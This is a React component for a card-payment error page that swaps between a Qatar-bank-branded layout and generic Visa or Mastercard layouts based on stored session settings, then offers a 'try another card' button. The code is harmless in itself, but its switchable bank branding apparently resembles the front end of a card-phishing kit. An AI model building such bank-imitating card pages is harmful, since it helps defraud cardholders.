import React from 'react';
import { useNavigate } from 'react-router-dom';
import StandardCardLayout from './StandardCardLayout';
import QatarBankLayout from './qatar/QatarBankLayout';
import { getTranslation } from '../Utils/i18n';
import { isMastercard } from '../Utils/cardScheme';

export default function ErrorPage({ config }) {
  const mode = config?.mode || localStorage.getItem('session_mode') || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardPT';
  const t = getTranslation(mode);
  const navigate = useNavigate();
  const design = localStorage.getItem('session_design') || 'standard_visa';

  const isQatar = design.startsWith('qatar_');
  const isMc = isMastercard(design);

  if (isQatar) {
    return (
      <QatarBankLayout
        design={design}
        title={t.errorTitle}
        subtitle={t.errorDesc}
        mode={mode}
      >
        <div style={{ textAlign: 'center', padding: '1rem 0' }}>
          <div style={{ display: 'flex', justifyContent: 'center', marginBottom: '1rem' }}>
            <svg width="48" height="48" viewBox="0 0 24 24" fill="none" stroke="#DC2626" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
              <circle cx="12" cy="12" r="10" />
              <line x1="15" y1="9" x2="9" y2="15" />
              <line x1="9" y1="9" x2="15" y2="15" />
            </svg>
          </div>
          <button
            type="button"
            className="qb-submit-btn"
            onClick={() => navigate('/br/homepage')}
          >
            {t.tryAnotherCard}
          </button>
        </div>
      </QatarBankLayout>
    );
  }

  return (
    <StandardCardLayout
      title={t.errorTitle}
      subtitle={t.errorDesc}
      mode={mode}
      scheme={isMc ? 'mastercard' : 'visa'}
    >
      <div style={{ textAlign: 'center', padding: '1rem 0' }}>
        <div style={{ display: 'flex', justifyContent: 'center', marginBottom: '1rem' }}>
          <svg width="44" height="44" viewBox="0 0 24 24" fill="none" stroke="#DC2626" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <circle cx="12" cy="12" r="10" />
            <line x1="15" y1="9" x2="9" y2="15" />
            <line x1="9" y1="9" x2="15" y2="15" />
          </svg>
        </div>
        <button
          type="button"
          className="scl-btn"
          onClick={() => navigate('/br/homepage')}
        >
          {t.tryAnotherCard}
        </button>
      </div>
    </StandardCardLayout>
  );
}
